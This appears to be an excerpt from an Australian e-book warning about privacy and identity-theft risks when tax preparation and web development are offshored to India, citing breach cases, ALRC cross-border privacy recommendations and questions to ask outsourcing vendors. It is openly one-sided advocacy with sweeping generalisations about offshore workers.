When Australian business sends their jobs offshore to India, it isnt just the jobs that go! Your sensitive personal information, including your drivers license, signatures passport, earnings, debts, assets … and personal account details, are also transferred offshore. Australian privacy laws dont apply in India or in many other developing countries.
In the USA, Senator John Kerrys 2004 campaign against offshoring jobs came at a time when the USA economy was struggling to create employment. Such a message carry's the exact same punch in today's Australia, with the specter of people losing their jobs.
The threat of identity theft from offshoring personal data, is an even a greater issue. Identity theft affects a broad cross section of the population, not just the unemployed or those about to lose their jobs.
Modern business has become increasingly borderless. The internet revolution and the reduction in international trade barriers have allowed business to globalize and for regions to specialize. For example, an Australian company could have their customer call center located in India; the product designed in Europe; built in China; and managed from Sydney or Melbourne. The company's business units must share their information about customers, employees, and suppliers.
Overseas business processing centers are now being used to handle sensitive customer data. For example, tax preparation, credit card applications, mortgages, insurance claims and help desk services are business areas that are currently being offshored to be processed in other countries. Australians are losing their jobs through the work they normally did being transferred to another country.
In a recent national Australian privacy phone-in, many Australians expressed their real concerns about Australian companies sending their customers, vendors and employees' personal information to overseas call centers. Consumers believe that their personal information must be protected like it is in Australia. Put simply, if you deal with an Australian company, you do not want that company passing your details overseas, where privacy laws are weak. You have a right to know when purchasing goods online whether your payment details are being sent overseas. Australian consumers view this as a huge security risk.
Case #1: How can your private data be leaked?
Did you know that someone you trust could inadvertently leak your personal financial details?
Let me illustrate how this can happen with a real life story. The person's names have been changed to prevent identification.
Bill an accountant, was preparing John's 2005 income tax return. During the conversation, John and his accountant discussed various private taxation & financial matters. The conversation changed when Bill spoke about the planned changes to their accounting practice in the coming financial year.
The practice intended to "off shore" their routine taxation preparation matters to a business processing operator (BPO) located in India. Bill's local staff would scan John's personal data into Bill's local computer system and the Indian workers would access Bill's system remotely to prepare John's tax return.
Bill planned that this change in business processing procedures would allow the practice to eliminate jobs. The lower staff costs would increase profits for the practice and provide financial savings for the client.
Bill said that he was forced to make these changes so that he could compete in the Australian marketplace. Bill assured John about the quality of the Indian staff. He claimed that the staff in the BPO was as good, if not better than the staff currently employed in the practice. Bill regretted the loss of jobs from the accounting practice but he maintained that "business is business"….and they really had no other choice!
John was concerned but he trusted Bill's judgment and agreed with Bill's proposal. There was a catch to this proposal….John's personal financial details could be sold or resold, without his knowledge or consent.
Unfortunately for John, a rogue staff member of the BPO vendor who sold his and many other tax clients' personal details to third parties. There was nothing Australian police could do about the data loss. John's only choice was to take civil action against Bill's accounting practice!
Case #2: How your new website could be hacked by offshore web programmers
Frank had engaged Max to build a new website for his real estate business. Frank had known Max personally for a long time and trusted Max. Max's web design business was booming. You see, Max was offering low cost high quality websites to his customers which completely undercut his Australian competitors.
The problem was that Max was unaware that one of his offshore web developers was corrupting the new websites by inserting malware code. This malware code enabled a key logger to be hidden in the code. As customers, vendors or employees records were being entered, the keylogger recorded the personal data including names, addresses, bank accounts, credit card numbers, e-mail addresses etc. The captured personal data was then transmitted back to the web developer who on-sold it to data brokers. Eventually, some of Max's customers became victims of identity theft!
The problem of data leaks in overseas locations
Millions of innocent consumers around the world have had their personal details leaked because someone they trusted failed to secure their personal data. In June 2005, Forty million credit card cardholders woke up to find there had been a security breach of at CardSystems Solutions, a US company that processes credit card transactions on behalf of card issuers. Their credit card account details had been stolen. The security breach included highly sensitive personal data like, PIN numbers, driver's license details, social security numbers….and private information like their "mother's maiden name."
The CardSystems incident illustrates the massive opportunities for identity theft. Highly sensitive personal information of customers, vendors and employees is currently being passed to overseas call centers and BPO's. Rogue employees are selling and reselling this private data to third parties….and there's nothing you can do about it!
In 2005, the ABC's "Four Corners" television program, showed how easy it is to purchase personal data through overseas "data harvesting" brokers. An under-cover reporter acted as an agent to on-sell the data. The data was originally stolen by relatively low-skilled staff employed by an Indian BPO. In 2005, many developing countries like India did not require third-party BPO providers to undergo data protection audits.
The "Four Corners" program emphasized that the data thefts occurred as part of outsourced arrangements. The security breaches occurred within vendor companies who provided contracted business services for corporate clients. This is no accident. Outsourcing makes fundamental changes to personnel control systems. It replaces the day-to-day supervision of staff with arms-length supervision of an external vendor through an "outcomes based" contract.
Cases of Data Misuse & Fraud in Indian Business Processing Organizations
There have been number of incidents of data misuse by staff of Indian business service organizations.
In June 2005, Interpol investigated a worker at Infinity eSearch. A reporter from The Sun claimed that the employee had sold him account details for 1,000 Barclay Bank customers. The account holders' secret passwords, addresses, phone numbers, and passport details were sold for $US 8000.
To put this in perspective, the average income of Indian workers is about $US 470 p.a. Indian call centre employees receive a salary of $US 12,000 p.a. exceeding the salaries of many early-career Indian teachers, accountants or lawyers.
There are flaws in having sensitive information in the hands of offshore employees in a developing country. The temptation is great to make vast amounts of money in local currency, by on-selling information to unscrupulous buyers. This is particularly relevant when the exchange rate makes the purchase cost in the western country is minimal.
In 2005, the Amicus Union (U.K.) issued general warnings about the state data protection in India. Companies that offshore jobs need to reflect on anticipated cost savings and profits. Is cutting cost more important than maintaining consumer confidence? Companies, who forget that retaining existing customers is much easier than finding new customers, often fail in the medium term.
In April 2005, Indian police arrested several men who had worked for an MphasiS call centre for Citibank. The former employees of MphasiS were charged with misusing financial data and stealing from the Citibank customers. The employees had obtained bank customers' account details and logged into Citibank's online system. They transferred $425,000 out of the customers' accounts.
Additional cases of Indian employees misusing data include:
In 2003, Indian employees of blackmailed Ohio's, Heartland Information Services, threatening to release confidential records;
In 2003, an Indian programmer working for India's Geometric Software Solutions Company tried to sell a source code from SolidWorks (its U.S. buyer) to another U.S.-based company;
In 2004, an Indian employee, who was working at a call centre in Noida, India, used an American's credit card to buy extensive electronics equipment from Sony; and
In 2005, a series of events similar to the incident with The Sun occurred. An alleged sale of sensitive personal data to undercover reporters from Australian Broadcasting Corporation was made for less than $US 8 per person.
Reports of fraud and theft of data in India have been increasing in recent years. Any misuse of sensitive personal data by offshore service providers is a serious threat to the success of globalization.
BPO vendors' are compelled by legal contracts to manage sensitive personal information of clients data. In practice, outsourced data security controls rarely work. They may be manageable for simple services where data loss has minimal consequences. However, the outsourcing of data controls for complex business services has serious consequences.
Many Australian business managers do not appreciate the risks of outsourcing their business processing operations. In this eBook, we draw on years' of practical experience in using outsourced operations to alert readers about some of these risks.
Experts agree that when your personal data is processed offshore, there is a very high risk of it being compromised. This is particularly so if both the sending and receiving country DO NOT HAVE adequate legal and system protections!
"The issues of data theft and outsourcing are intimately connected because BPO services can only be supplied by lower-cost vendors if the client hands over its critical data to the vendor in (easily stolen) electronic form. This electronic data is relatively easily accessed (and copied) by the vendor's front-line operators, effectively white collar "shop floor workers" with limited loyalty to the company." Anne Rouse and David Watson Monash University Business Review, Volume 1, Issue 2 2005
The main driver for off shoring accounting practices' client taxation affairs is the reduction in practice costs! Unfortunately, data protection is often not considered! Here is a list of personally identifiable information that is included in your Australian tax return:
Tax File Number:
Your Name;
Your Address;
The name of your partner and their Tax file number;
Your Date of Birth;
Your Income;
Your expenses; and
Investments including shares, properties, cash and superannuation.
…. And much, much more!
This data represents your personal financial data, it is private, and it confirms your identity. When your Australian tax return is being prepared, you are required to provide receipts for any expenditure you are claiming. Receipts provide third party confirmation of your identity!
Australian taxpayers should also be very concerned….
Outsourcing tax preparation services to an overseas company in India or any other third world country, is causing concerns to the many security conscious Australians. The burning question is this ….Has the overseas company implemented adequate security measures to avoid fraud and identity theft from employees and outsiders?
The Australian taxpayer does not have a direct contract with the offshore BPO. Your legal rights are largely determined by the contract that you have with your accountant. Your accountant may have a contract with the offshore BPO. If the BPO has a direct presence in Australia i.e. a physical office, then the accountant can take direct legal action against the BPO in Australian courts. Otherwise, the parties would have to settle in the law courts of the country where the BPO resides.
In Australia the transfer of sensitive data to another country requires consent. If you provide that consent to offshore you data, then you do so at your own risk. If you're sensitive data has been offshored without your express consent, then the sender would be held liable under Australian laws. Accountants who "off shore" client data currently DO NOT NEED client approval. However, if client's data is leaked they will face lawsuits and damage to their brand.
Data Security loop-holes exist when some countries have exemptions from Privacy laws. For example, Australia provides exemption to the Australian Privacy laws for small business whose turnover is less than $3 million. For example, Australian suburban accounting practice or software developer could offshore your personal sensitive data to a low wage country like India and be exempt from Australia's privacy laws! This loophole allows small businesses to send your personal financial data to an overseas country where privacy is unregulated….A practice that could expose you to identity fraud!
Virtually any outsourced business process may involve privacy violations arising from mistakes or negligence. This includes the receipt, custody, processing, storage, access, encryption and transmission of confidential records of individuals. The weakest point in the chain could be anything from a human problem, to a data problem, to an encryption problem, to a policy problem, to a customer service problem.
Further, most Australian suburban accounting practices are not experienced with international operations! They have not experienced the extensive data security issues when they offshore their client tax returns to BPO's in other countries.
Outsourcing vendors argue clients' data is safe if they are allowed access to the accountant's system and are restricted to a strict work flow procedure. While this is possible, it is costly to implement and it is so stringent that it would defeat the whole purpose of offshoring.
For example, how would a business processing vendor be able to perform client reconciliations without having access to the client's raw financial data? The proposal simply does not make sense! The vendor would need complete read/write access to client's raw data resulting in very high data security risks for the client!
In my opinion, the Australian accounting profession and web developers have not properly considered the risks off shoring and the consequences of data leaks! If you allow your sensitive data to be sent offshore for processing, you do so at your own risk….unscrupulous operators download and sell your private information to criminal gangs!
The question you have to ask yourself is this - how secure do you feel about your sensitive financial data being transmitted to a low wage country by your accountant? Would you be happy if you found out that someone in India was accessing your details on your accountants' client accounting system? Did you know that this could be happening to you NOW without your knowledge or consent?
The Future of Offshoring
The most commonly outsourced finance and accounting functions are tax consulting and payroll, according to a survey of senior U.S. executives by Ross Research. Recently there have been predictions that finance and accounting functions will become the most widely outsourced business processes in the next few years. However, there are certain finance and accounting functions that Ross Research survey respondents said they would NEVER outsource or off shore, including:
Financial Management Activities: operating budgets/forecasts, capital investments, treasury functions, equity financing/debt, cash management, budgeting, performance analysis and investor relations.
General Accounting: general ledger, cost accounting/revenue, equity accounting/debt, statutory accounting, fixed asset accounting and business unit accounting.
Financial Reporting and Accounting: tax, accounts payable/receivable, leases, billing/customer invoice and customer credit/expense reporting
Questions you should ask if you intend to outsource or offshore your service business
In my professional experience, I have maintained financial systems which include ensuring there is data integrity. It is important that both internal and external systems controls are present for sensitive financial transactions within Australian companies.
I have also worked on helpdesks in outsourced companies. You could say I have seen how outsourcing works from both sides of the fence! While I have never been employed in the accounting practices, I have been a member of the accounting profession for over 30 years.
Here are ten tough questions that you should ask if you intend to outsource your business operations. Your clients have every right to have these questions answered satisfactorily. If you cannot answer them, then you shouldn't be outsourcing:
Where will my data and applications physically reside? What compliance and security protections are enforced for those locations? Does the data go to any other entity outside of the vendor? Does it ever leave the country? You should dig deeper and demand the same level of security of your sensitive data as if they were doing it themselves. Blind trust is not good enough!
Will my personal data be stored on dedicated or shared infrastructure? If shared, how does the vendor maintain compliance between your data, the data of your accountants' clients and the data of other accountants' clients? How does the vendor maintain isolation and privacy of your sensitive personal data? You should demand an understanding of the security controls the BPO has in place to protect your sensitive data. The BPO should be able to demonstrate these controls to you.
Is the vendor running intrusion detection or intrusion protection on the network? This has been a compliance requirement for some time now. Most vendors should be able to fill the check mark in the box for perimeter intrusion detection technology.
Is the vendor using data encryption? While the vendor will be primarily concerned with demonstrating cost reduction, you need to see that your personal data is safe from hackers. Technologies like full-disk encryption, media encryption, device firewalls and anti-malware must be compulsory.
What is the service level agreement for updating security policies and protections when new security threats arise? Most outsourcing providers will have service level agreements defined. However, you must check their references to ensure that the vendor can prove that they deliver as agreed. Further, they should not price gouge if your system change requests exceed your monthly quota.
How often does the vendor update firewall rules/policies? One must have frequent updates to security policies and protections in order to stay ahead of security threats.
What insurance coverage does the vendor have in the event of a data security breach? What is its incident response plan/process? No security vendor assumes the risk of a full security breach. They do, however, provide service level agreements to mitigate risk. Any outsourcing negotiation should specific definitions of liability of all parties to the agreements.
What cyber forensics capabilities are there? Security response and business process is equally important as the ability to effectively manage security policies.
How does the vendor stay in touch with the broader security community, and how does it receive updates? An outsourcing vendor should demonstrate that it is plugged in to the broader community and has multiple data feeds for new threats, viruses and other malicious code.
What is my ability to get out of the contract? Vendors naturally try to lock clients in to long-term, five-year-plus engagements. Until that vendor has demonstrated that it treats your data security and protecting your business as mission critical, long-term contracts are higher risk.
Australian Cross Border Privacy Laws give greater certainty for Australians
Australians are very concerned when their personal information being sent or held overseas without their knowledge and consent.
In 2008, the Australian Law Reform Commissions' (ALRC) president, Professor David Weisbrot, said:
"This unease appears to reflect a general feeling by people that they are losing control over something deeply personal, with little ability to do anything about it, and few remedies if anything goes wrong overseas." ALRC Media Briefing - New Cross-Border Privacy Laws-Greater Certainty For All Australians.
Major Australian banks and credit card companies, who deal with your personal information, often conduct their 'back office' processing in data centers located overseas. However, these large companies have extensive financial and system controls built in to protect your data from fraudulent use.
The internet allows you to purchase goods and services over the internet, from websites hosted by overseas companies. You'll probably pay for those goods and services using a credit card. For example, this e-book was written by an Australian author; the copyright is owned by an Australian company Webmarketing Technology Pty Ltd; the website in the hosted in the USA; and your credit card purchase was processed via a PayPal, a US based company with Australian operations. The process flow for this simple purchase involves your personal information flowing across Australian and USA jurisdictions. There is identity checking, credit verification, data processing, stock checking and shipping ….all handled in different countries.
Professor Les McCrimmon, Commissioner in charge of the Privacy Inquiry, said that:
"While the Privacy Act provides some protection for personal information transferred to another country by businesses, it does not apply to government agencies-and there are general concerns about whether the law currently provides an adequate level of protection."
Australian businesses want to be able choose the most effective and cost efficient means of storing and processing their customer data. This often means that they may transfer it overseas. Businesses don't want to be forced to seek regular customer consent every time a transaction is processed.
"Businesses and governments promoting the economic benefits of efficient information handling and increasing access to global markets for trade and labour need a framework that can facilitate cross-border data flows, while providing individuals with a level of assurance that this will not compromise the security or privacy of their personal information," Professor McCrimmon said.
In the document For Your Information: Australian Privacy Law and Practice , the ALRC recommended a new approach to cross-border data flows. Their aim is to create greater business certainty for Australian businesses and individuals. This document also ensures that there is adequate protection of your privacy and need to transfer and store customer information.
The ALRC recommends that any government agency or business that transfers your personal information outside Australia must always remain responsible for the protection of that information. This ensures that you have the ability to report breaches to Australian privacy regulator and seek redress from party who leaked your data.
There are three specific circumstances when a business is not responsible. These are when:
The agency or organisation reasonably believes that the privacy protections in the receiving country are of a similar standard to Australia's;
The individual consents to the transfer after being expressly advised by the company. The consequence of providing this consent is that the business will no longer be held responsible for data leaks; or
A government agency is 'required or authorised by law' to transfer your personal information.
These qualifications will allow Australian businesses to deal with any liability that may arise through commercial contracts signed by the contracting parties. , Government agencies will be allowed to transfer information overseas when they are required to do so by law. For example, extradition proceedings or public health emergencies.
For more information about cross-border data flow see Chapter 31 of For Your Information: Australian Privacy Law and Practice (ALRC 108, 2008).
The USA Experience in Offshoring Tax Preparation
In 2010, more than 1 million USA citizens that will have their income tax returns prepared by outsourced companies to India. It is a very disturbing fact that these taxpayers are not told that their private tax and financial documents can be viewed on computer screens half-way around the world.
"Taxpayers should have the right to say 'no' to being exposed to the risks of identity theft and fraud. Security flaws in offshore tax preparation encourage cyber terrorism by those who would victimize every family in our country. This situation is a clear and present danger to the United States and its citizens today." - Steven K. Ladd, CEO, Copanion, Inc.
"Offshore tax preparation represents a very real danger for the United States and its citizens. Many taxpayers have trusted a US tax preparer with their most personal and confidential financial information, so they are innocently unaware of being vulnerable to identity theft and fraud when their returns are actually processed in India," according to Steven K. Ladd, CEO, Copanion, Inc., a software developer serving the accounting industry.
Steven Ladd is a former Fortune 500 executive. He appreciates the advantages of outsourcing tax preparation services to offshore companies. This includes lower staff costs and shorter tax return preparation cycle time….which in turn means increased profits.
"That is the upside of offshore outsourcing," Ladd said. "But I am also aware of the considerable risks that result from offshore tax preparation. I know that because I am also chairman of a New Hampshire accounting firm that considered outsourcing tax work to India to help manage our busy tax season. The president of our firm, a CPA who is a veteran of 25 tax seasons, and I traveled to India to inspect resources there. We held more than 60 hours of face-to-face meetings with outsourcing firms both large and small, and we were shocked at the lack of adequate security present at all of them." he said.
"We judged the risks for our clients to be too great, so we kept everything in-house," said Ladd. "We agree with IRS Commissioner Mark Everson and US Representative Ed Markey that American taxpayers must be protected from these risks. Offshore outsourcing risks the identity and financial security of taxpayers who may unknowingly be put in jeopardy."
This is not an exaggeration. Most American taxpayers wouldn't give telemarketers their social security numbers. Yet their most intimate personal and financial information has been released by US public accountants to be prepared by staff employed in overseas firms.
USA taxpayers should be very concerned…..
Employees of offshore tax preparation companies can view individual taxpayers' details. The information they can see will be limited to the level of security provided to perform their role or job. In other words they should only be given the minimum security required to perform their job. Ideally a strict work flow procedure would be employed to automate the complete tax preparation process.
Ladd observed that they found that the taxpayers data a BPO employee could see included the taxpayers full name; date of birth; residential and business addresses; social security numbers (USA only); phone numbers; email addresses; wages; banks; brokerage statements and mutual funds. They can even see the numbers of the taxpayer's cheque and savings accounts.
"This information is the ultimate pot of gold for an identity thief," Ladd emphasized. "Tax returns are road maps to individuals' identities and assets. Unprotected as they are in the offices of most offshore tax preparers, American taxpayers' tax returns are like an exposed wallet just waiting to be lifted by a career pickpocket. As a nation ever vigilant against terrorism, we must guard against those who would steal our identities, injure our economy and threaten our national security. When taxpayers realize what is happening to their information, offshore outsourcing may become as big an issue as the aborted Dubai ports deal."
USA taxpayer's personal data is NOT protected under USA Federal law when it is electronically transferred to another country and stored on the computer servers in that country. If the taxpayer's private data is subsequently leaked from those computer servers to a third party, then that countries law applies. The USA taxpayer's rights are determined by the terms of the contract between the USA Company and the offshored BPO. They could take legal action the USA tax preparer, who in turn would take legal action against the BPO.
Mr. Ladd testified to a 2006 IRS hearing in Washington, DC. He supports tougher regulations requiring taxpayer's express written consent before their tax preparation work can be outsourced. Mr. Ladd has also proposed that a stronger specific warning be given to taxpayers about the risks of sending taxpayer information to preparers located outside the USA.
Australian taxpayer's whose accounting & tax return preparation is offshored for preparation in another country, face the exact same issues as USA taxpayers.
What's Next?
